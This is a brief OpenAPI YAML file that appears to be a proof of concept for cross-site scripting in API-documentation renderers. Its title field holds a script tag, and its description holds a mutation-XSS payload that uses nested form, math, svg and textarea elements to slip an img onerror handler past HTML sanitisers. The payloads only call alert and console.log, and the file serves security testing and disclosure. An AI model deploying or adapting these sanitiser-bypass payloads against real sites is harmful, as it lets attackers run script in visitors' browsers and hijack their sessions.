---
openapi: 3.0.1
info:
  title: Tempest<script>console.log(document.domain)</script> PoC2
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src>"></form>

  version: '1.0'
paths:
  "/path/malformed/by/afine":
    post:
      tags:
      - afine
      parameters:
      - name: afine
